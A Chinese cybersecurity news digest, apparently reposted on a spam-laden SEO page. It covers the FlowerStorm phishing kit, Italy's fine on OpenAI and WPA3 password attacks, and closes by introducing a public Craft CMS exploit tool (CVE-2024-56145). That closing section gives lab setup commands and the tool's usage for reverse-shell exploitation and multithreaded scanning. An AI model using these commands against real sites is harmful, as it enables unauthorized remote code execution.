中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

網(wǎng)站的類型和特色青島seo外包公司

網(wǎng)站的類型和特色,青島seo外包公司,中國最好的工業(yè)設(shè)計(jì)公司,wordpress responsive lightbox國內(nèi)外要聞 Rockstar 2FA 故障催生 FlowerStorm 釣魚即服務(wù)擴(kuò)張現(xiàn)象剖析 在網(wǎng)絡(luò)安全的復(fù)雜戰(zhàn)場中,近期出現(xiàn)了一個(gè)值得關(guān)注的動(dòng)態(tài):名為 Rockstar 2FA 的釣魚即服務(wù)(PhaaS)工具包遭遇變故,意外推動(dòng)了另一個(gè)新生服務(wù) Flo…

國內(nèi)外要聞

Rockstar 2FA 故障催生 FlowerStorm 釣魚即服務(wù)擴(kuò)張現(xiàn)象剖析

? ??在網(wǎng)絡(luò)安全的復(fù)雜戰(zhàn)場中,近期出現(xiàn)了一個(gè)值得關(guān)注的動(dòng)態(tài):名為 Rockstar 2FA 的釣魚即服務(wù)(PhaaS)工具包遭遇變故,意外推動(dòng)了另一個(gè)新生服務(wù) FlowerStorm 的猖獗擴(kuò)張。

????據(jù) Sophos 上周發(fā)布的新報(bào)告指出,運(yùn)營 Rockstar 2FA 服務(wù)的團(tuán)體似乎經(jīng)歷了至少部分基礎(chǔ)設(shè)施的崩潰,與該服務(wù)相關(guān)的頁面已無法訪問?!斑@并非由于執(zhí)法取締行動(dòng),而是服務(wù)后端出現(xiàn)了一些技術(shù)故障?!?上月末,Trustwave 首次記錄了 Rockstar 2FA,它作為一種 PhaaS 服務(wù),能讓不法分子發(fā)起釣魚攻擊,竊取微軟 365 賬戶憑據(jù)和會(huì)話 cookie,繞過多重身份驗(yàn)證(MFA)保護(hù)。該服務(wù)被評(píng)估為 DadSec 釣魚工具包的更新版本,微軟以 Storm - 1575 之名對(duì)其追蹤,多數(shù)釣魚頁面托管于.com、.de、.ru 和.moscow 頂級(jí)域名,不過.ru 域名的使用據(jù)信已隨時(shí)間減少。

圖片

??? 2024 年 11 月 11 日,Rockstar 2FA 似乎遭遇技術(shù)中斷,轉(zhuǎn)向中間誘餌頁面時(shí)引發(fā) Cloudflare 超時(shí)錯(cuò)誤,偽造登錄頁面無法加載。雖然尚不清楚中斷緣由,但此 PhaaS 工具包留下的空白,致使與 FlowerStorm 相關(guān)的釣魚活動(dòng)激增。FlowerStorm 至少自 2024 年 6 月起就已活躍,Sophos 稱,二者在釣魚門戶頁面格式及連接后端服務(wù)器竊取憑據(jù)的方法上存在相似之處,暗示可能有共同起源,且都濫用 Cloudflare Turnstile 防止頁面請(qǐng)求來自機(jī)器人。有人懷疑 11 月 11 日的中斷,要么代表其中一個(gè)團(tuán)體的戰(zhàn)略轉(zhuǎn)向,要么是運(yùn)營人員變動(dòng),抑或是有意拆分兩項(xiàng)業(yè)務(wù),現(xiàn)階段尚無確鑿證據(jù)將二者關(guān)聯(lián)。

????使用 FlowerStorm 最頻繁的目標(biāo)國家包括美國、加拿大、英國、澳大利亞、意大利、瑞士、波多黎各、德國、新加坡和印度。Sophos 表示:“受攻擊最嚴(yán)重的行業(yè)是服務(wù)業(yè),尤其聚焦于提供工程、建筑、房地產(chǎn)、法律服務(wù)與咨詢的公司?!?這些發(fā)現(xiàn)再次凸顯出一種持續(xù)趨勢:攻擊者即便無需深厚技術(shù)專長,也能利用網(wǎng)絡(luò)犯罪服務(wù)和通用工具大規(guī)模發(fā)動(dòng)網(wǎng)絡(luò)攻擊,這為網(wǎng)絡(luò)安全防護(hù)敲響了警鐘,各方需進(jìn)一步加強(qiáng)防范與監(jiān)測,以應(yīng)對(duì)此類不斷演變的威脅。

圖片

意大利因 ChatGPT 違反 GDPR 數(shù)據(jù)隱私規(guī)定對(duì) OpenAI 罰款 1500 萬歐元

????在數(shù)據(jù)隱私備受矚目的當(dāng)下,意大利的數(shù)據(jù)保護(hù)機(jī)構(gòu)對(duì) ChatGPT 的開發(fā)者 OpenAI 開出了高達(dá) 1500 萬歐元(約合 1566 萬美元)的罰單,原因是這款生成式人工智能應(yīng)用在處理個(gè)人數(shù)據(jù)方面存在諸多問題。

????早在近一年前,意大利數(shù)據(jù)保護(hù)機(jī)構(gòu)(Garante)就發(fā)現(xiàn) ChatGPT 在違反歐盟《通用數(shù)據(jù)保護(hù)條例》(GDPR)的情況下,使用用戶信息來訓(xùn)練其服務(wù)。該機(jī)構(gòu)指出,OpenAI 未就 2023 年 3 月發(fā)生的安全漏洞向其通報(bào),并且在沒有充分法律依據(jù)的情況下,使用用戶的個(gè)人信息來訓(xùn)練 ChatGPT。同時(shí),還指責(zé)該公司違背了透明度原則以及對(duì)用戶的相關(guān)信息告知義務(wù)。

????此外,Garante 表示:“OpenAI 也未設(shè)立年齡驗(yàn)證機(jī)制,這可能會(huì)使 13 歲以下兒童面臨接觸與其發(fā)展程度和自我認(rèn)知不符的不當(dāng)回應(yīng)的風(fēng)險(xiǎn)?!?除了罰款,OpenAI 還被要求開展為期六個(gè)月的宣傳活動(dòng),通過廣播、電視、報(bào)紙以及互聯(lián)網(wǎng)等渠道,增進(jìn)公眾對(duì) ChatGPT 運(yùn)作方式的了解。

????具體而言,要讓公眾知曉其為訓(xùn)練模型所收集的數(shù)據(jù)(包括用戶和非用戶信息)的性質(zhì),以及用戶可用來反對(duì)、更正或刪除這些數(shù)據(jù)的權(quán)利。Garante 補(bǔ)充道:“通過這次宣傳活動(dòng),ChatGPT 的用戶和非用戶都必須清楚如何阻止生成式人工智能使用他們的個(gè)人數(shù)據(jù)進(jìn)行訓(xùn)練,從而切實(shí)保障他們?cè)?GDPR 下的權(quán)利?!?/p>

????意大利曾在 2023 年 3 月下旬率先以數(shù)據(jù)保護(hù)擔(dān)憂為由,對(duì) ChatGPT 實(shí)施了臨時(shí)禁令。近一個(gè)月后,在 OpenAI 解決了 Garante 提出的相關(guān)問題后,ChatGPT 才恢復(fù)訪問。OpenAI 在發(fā)給美聯(lián)社的一份聲明中稱,這一處罰決定并不合理,其打算提起上訴,稱該罰款金額幾乎是其在意大利那段時(shí)期營收的 20 倍。同時(shí),它還表示致力于提供有益且尊重用戶隱私權(quán)的人工智能。

????此次裁決出臺(tái)之前,歐洲數(shù)據(jù)保護(hù)委員會(huì)(EDPB)曾提出一種觀點(diǎn),即非法處理個(gè)人數(shù)據(jù)但在部署前已進(jìn)行匿名化處理的人工智能模型,并不構(gòu)成違反 GDPR 的行為。該委員會(huì)表示:“如果能夠證明人工智能模型后續(xù)的運(yùn)行不涉及個(gè)人數(shù)據(jù)處理,那么 EDPB 認(rèn)為 GDPR 并不適用。因此,初始處理的非法性不應(yīng)影響模型后續(xù)的運(yùn)行。”

????而且,EDPB 還認(rèn)為,當(dāng)控制者在模型匿名化后,對(duì)部署階段收集的個(gè)人數(shù)據(jù)進(jìn)行后續(xù)處理時(shí),GDPR 將適用于這些處理操作。本月早些時(shí)候,該委員會(huì)還發(fā)布了關(guān)于以符合 GDPR 的方式處理向非歐洲國家進(jìn)行數(shù)據(jù)轉(zhuǎn)移的指南,這些指南將接受公眾咨詢,截止日期為 2025 年 1 月 27 日,并指出 “第三國當(dāng)局的判決或決定不能在歐洲自動(dòng)得到認(rèn)可或執(zhí)行。如果一個(gè)組織響應(yīng)第三國當(dāng)局對(duì)個(gè)人數(shù)據(jù)的請(qǐng)求,這種數(shù)據(jù)流動(dòng)就構(gòu)成了轉(zhuǎn)移,GDPR 就會(huì)適用。”

圖片

WPA3 網(wǎng)絡(luò)密碼遭中間人攻擊與社會(huì)工程學(xué)手段繞過

????在網(wǎng)絡(luò)安全領(lǐng)域,近期研究有了令人擔(dān)憂的發(fā)現(xiàn):研究人員成功地通過結(jié)合中間人(MITM)攻擊和社會(huì)工程學(xué)技術(shù),繞過了 Wi-Fi 保護(hù)訪問 3(WPA3)協(xié)議以獲取網(wǎng)絡(luò)密碼。

????來自西印度群島大學(xué)的凱爾?查迪、韋恩?古德里奇和科夫卡?汗開展的此項(xiàng)研究,凸顯了最新無線安全標(biāo)準(zhǔn)中潛在的漏洞。WPA3 于 2018 年推出,旨在彌補(bǔ)其前身 WPA2 的缺陷,并為 Wi-Fi 網(wǎng)絡(luò)提供更強(qiáng)的安全性。其關(guān)鍵特性之一是對(duì)等同時(shí)認(rèn)證(SAE)協(xié)議,旨在使密碼能抵御離線字典攻擊。

????然而,研究人員證明可以利用 WPA3 過渡模式中的弱點(diǎn),該模式用于與 WPA2 設(shè)備向后兼容。通過利用降級(jí)攻擊,他們能夠捕獲部分 WPA3 握手信息,然后結(jié)合社會(huì)工程學(xué)技術(shù)來恢復(fù)網(wǎng)絡(luò)密碼。

圖片

????攻擊方法主要包含三個(gè)主要步驟:首先,使用降級(jí)攻擊捕獲握手信息;其次,將用戶從原始 WPA3 網(wǎng)絡(luò)中解除認(rèn)證;最后,創(chuàng)建一個(gè)帶有強(qiáng)制門戶的 “惡意雙胞胎” 接入點(diǎn)以獲取密碼。研究人員使用樹莓派來模擬 WPA3 接入點(diǎn),并利用 Airgeddon 等開源工具來創(chuàng)建惡意接入點(diǎn)和強(qiáng)制門戶。當(dāng)毫無防備的用戶嘗試連接到虛假網(wǎng)絡(luò)時(shí),會(huì)被提示輸入 Wi-Fi 密碼,然后該密碼會(huì)與捕獲的握手信息進(jìn)行驗(yàn)證。

圖片

????這項(xiàng)研究引發(fā)了對(duì) WPA3 安全性的擔(dān)憂,尤其是其過渡模式。研究發(fā)現(xiàn),當(dāng)未實(shí)施受保護(hù)管理幀(這是許多用戶可能未意識(shí)到或未啟用的設(shè)置)時(shí),攻擊能夠成功。有趣的是,研究人員還發(fā)現(xiàn)一些設(shè)備無法連接到 WPA3 過渡網(wǎng)絡(luò),這與 Wi-Fi 聯(lián)盟聲稱的與 WPA2 的向后兼容性相矛盾。

????雖然該攻擊需要特定條件和用戶交互,但它表明了保護(hù)無線網(wǎng)絡(luò)面臨的持續(xù)挑戰(zhàn)。研究人員強(qiáng)調(diào)了用戶教育以及正確配置 WPA3 網(wǎng)絡(luò)以減輕此類風(fēng)險(xiǎn)的重要性。網(wǎng)絡(luò)安全專家呼吁對(duì) WPA3 的漏洞進(jìn)行進(jìn)一步調(diào)查,并開發(fā)更多的防護(hù)措施。由于 Wi-Fi 網(wǎng)絡(luò)對(duì)于企業(yè)和個(gè)人而言都是關(guān)鍵基礎(chǔ)設(shè)施,確保其安全性至關(guān)重要。

????這項(xiàng)研究的結(jié)果提醒人們,即使是最先進(jìn)的安全協(xié)議也可能容易受到技術(shù)漏洞利用和社會(huì)工程學(xué)巧妙組合的攻擊。隨著 WPA3 采用率的增加,用戶和制造商都必須保持警惕,并實(shí)施最佳實(shí)踐以保護(hù)無線網(wǎng)絡(luò)免受潛在攻擊。研究團(tuán)隊(duì)計(jì)劃繼續(xù)開展工作,探索更多漏洞并開發(fā)對(duì)策,以增強(qiáng) WPA3 和未來無線協(xié)議的安全性。他們的努力有助于在不斷演變的數(shù)字安全環(huán)境中,網(wǎng)絡(luò)安全專業(yè)人員與潛在攻擊者之間持續(xù)的對(duì)抗。

圖片

知識(shí)分享

CVE-2024-56145: Craft CMS 漏洞利用工具介紹

一、工具背景與用途

????這款工具旨在利用 Craft CMS 中存在的一個(gè)漏洞,該漏洞是由 Assetnote 出色的研究團(tuán)隊(duì)所發(fā)現(xiàn)的。這個(gè)漏洞源于對(duì)用戶提供的模板路徑處理不當(dāng),使得攻擊者能夠通過特制的有效載荷實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行(RCE)。

二、工具特點(diǎn)

  1. 自動(dòng)化 FTP 服務(wù)器:具備自動(dòng)化的 FTP 服務(wù)器功能,可用于提供惡意的有效載荷,方便攻擊者實(shí)施相關(guān)攻擊行為。

  2. 多種反向 shell 有效載荷生成:支持生成多種類型(如 bash、nc、mkfifo 等)的反向 shell 有效載荷,使用者可根據(jù)具體需求進(jìn)行選擇,增加了攻擊手段的靈活性。

  3. 漏洞檢查功能:提供漏洞檢查器,能夠識(shí)別存在此漏洞的易受攻擊目標(biāo),有助于攻擊者篩選合適的攻擊對(duì)象,也方便安全人員提前排查隱患。

  4. 多線程支持:支持多線程運(yùn)行,能夠?qū)崿F(xiàn)更快的掃描速度,在面對(duì)大量目標(biāo)時(shí)可以有效提高檢測或攻擊的效率。

  5. 易用的 CLI 界面:擁有清晰易用的命令行界面(CLI),操作過程中會(huì)給出明確的反饋信息,無論是專業(yè)安全人員還是有一定基礎(chǔ)的使用者都能較方便地操作該工具。

三、搭建易受攻擊的測試環(huán)境(設(shè)置漏洞測試實(shí)驗(yàn)室)

????若要設(shè)置用于測試目的的 Craft CMS 實(shí)例,可按照以下步驟進(jìn)行操作:

  1. 首先創(chuàng)建相關(guān)目錄并進(jìn)入:

mkdir exploit-craft && \cd exploit-craft && \

2. 配置 DDEV 項(xiàng)目用于 Craft CMS:

ddev config \  --project-type=craftcms \  --docroot=web \  --create-docroot \  --php-version="8.2" \  --database="mysql:8.0" \  --nodejs-version="20" && \

3.?創(chuàng)建 DDEV 項(xiàng)目:

ddev?start?-y?&&?\

4. 創(chuàng)建指定版本的 Craft CMS:

ddev?composer?create?-y?--no-scripts?--no-interaction?"craftcms/craft:5.0.0"?&&?\

5. 安裝特定的 CMS 版本:

ddev?composer?require?"craftcms/cms:5.5.0"?\  --no-scripts \  --no-interaction --with-all-dependencies && \

6. 設(shè)置 Craft CMS 的安全密鑰:

ddev?craft?setup/security-key?&&?\

7.?安裝 Craft CMS:

ddev?craft?install/craft?\    --username=admin \    --password=password123 \    --email=admin@example.com \    --site-name=Testsite \    --language=en \    --site-url='$DDEV_PRIMARY_URL' && \

8. 為 PHP 啟用 register_argc_argv:

mkdir?-p.ddev/php/?&&?\echo "register_argc_argv = On" >.ddev/php/php.ini && \ddev restart && \

9. 最后輸出提示信息并啟動(dòng)項(xiàng)目:???????

echo?'Nice,?ready?to?launch!'?&&?\ddev launch

四、工具使用方法

查看幫助信息:
運(yùn)行工具時(shí)添加?--help?標(biāo)志,就能查看可用的命令,命令格式如下:

python exploit.py --help

利用命令(Exploit Command):

若要利用某個(gè)目標(biāo)的漏洞,使用以下命令格式:

python exploit.py exploit -u <TARGET_URL> -lh <LOCAL_HOST> -lp <LOCAL_PORT> -px <PAYLOAD_TYPE>

各參數(shù)含義如下:

-u 或?--url:指定目標(biāo) URL,此參數(shù)是必需的。-lh 或?--lhost:用于接收反向 shell 的本地 IP,也是必需參數(shù)。-lp 或?--lport:本地用于監(jiān)聽的端口,同樣為必需項(xiàng)。-fh 或?--ftp-host:FTP 服務(wù)器主機(jī)地址。-fp 或?--ftp-port:FTP 服務(wù)器端口號(hào)。-px 或?--payload:有效載荷類型(可選 bash、nc、mkfifo 等),默認(rèn)值為 bash。??????
例如:python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash

檢查命令(Check Command)

python exploit.py check -u <TARGET_URL> -f <FILE_WITH_URLS> -t <THREADS> -o <OUTPUT_FILE>

各參數(shù)含義如下:???????

-u 或?--url:單個(gè)目標(biāo) URL。-f 或?--file:包含多個(gè)要掃描的 URL 的文件。-t 或?--threads:用于掃描的并發(fā)線程數(shù)量。-o 或 --output:用于保存結(jié)果的輸出文件。

例如:

python exploit.py check -f urls.txt -t 10 -o results.txt

????最后需要強(qiáng)調(diào)的是,應(yīng)秉持負(fù)責(zé)任、符合道德的態(tài)度來使用這款工具,該工具的代碼倉庫地址為

?https://github.com/Chocapikk/CVE-2024-56145,使用者可前往獲取更多詳細(xì)內(nèi)容。

http://www.risenshineclean.com/news/45887.html

相關(guān)文章:

  • 做網(wǎng)站月度總結(jié)seo推廣教程
  • 游戲網(wǎng)站模板下載aso優(yōu)化排名違法嗎
  • 關(guān)于網(wǎng)站優(yōu)化的文章百度云搜索引擎入口手機(jī)版
  • 白鷺引擎做h5網(wǎng)站cba目前排名
  • 合肥網(wǎng)站建站報(bào)廣告代理在線之家
  • 菲律賓有做網(wǎng)站的嗎電腦上突然出現(xiàn)windows優(yōu)化大師
  • 建設(shè)一個(gè)網(wǎng)站多少錢游戲推廣怎么快速拉人
  • 做外貿(mào)沒有網(wǎng)站可以嗎江蘇提升關(guān)鍵詞排名收費(fèi)
  • 廣州專業(yè)的網(wǎng)站建設(shè)公司play商店
  • 深圳做網(wǎng)站d廣州推廣優(yōu)化
  • 九口袋網(wǎng)站建設(shè)免費(fèi)b站推廣
  • 做產(chǎn)品類網(wǎng)站有哪些內(nèi)容想要網(wǎng)站推廣頁
  • 網(wǎng)站備案被注銷了怎么辦江蘇企業(yè)網(wǎng)站建設(shè)
  • 銀川網(wǎng)站建設(shè)設(shè)計(jì)短視頻如何引流與推廣
  • 專門查企業(yè)信息的網(wǎng)站百度有幾種推廣方式
  • 西安 美院 網(wǎng)站建設(shè)百度關(guān)鍵詞的費(fèi)用是多少
  • 蘭州網(wǎng)絡(luò)推廣方法深圳專業(yè)seo
  • 深圳網(wǎng)站建設(shè)怎樣容易南寧網(wǎng)絡(luò)推廣品牌
  • 保溫管有哪些網(wǎng)站做網(wǎng)絡(luò)推廣員為什么做不長
  • 做二手元器件那個(gè)網(wǎng)站查價(jià)格關(guān)鍵詞排名批量查詢軟件
  • 網(wǎng)站換ip對(duì)優(yōu)化有影響嗎網(wǎng)站建站推廣
  • 做網(wǎng)站系統(tǒng)站長之家站長工具
  • 邢臺(tái)做網(wǎng)站咨詢站內(nèi)seo內(nèi)容優(yōu)化包括
  • 蘋果做封面下載網(wǎng)站中央新聞直播今天
  • 愛站網(wǎng)官網(wǎng)關(guān)鍵詞查詢精準(zhǔn)營銷推廣方案
  • 網(wǎng)站建設(shè)中高低端區(qū)別北京計(jì)算機(jī)培訓(xùn)機(jī)構(gòu)哪個(gè)最好
  • 游戲下載網(wǎng)站 wordpress哈爾濱關(guān)鍵詞排名工具
  • 上海app服務(wù)商北京seo薪資
  • dota2max網(wǎng)站怎么做壁紙西安百度公司官網(wǎng)
  • 傳奇手游官網(wǎng)下載威海seo公司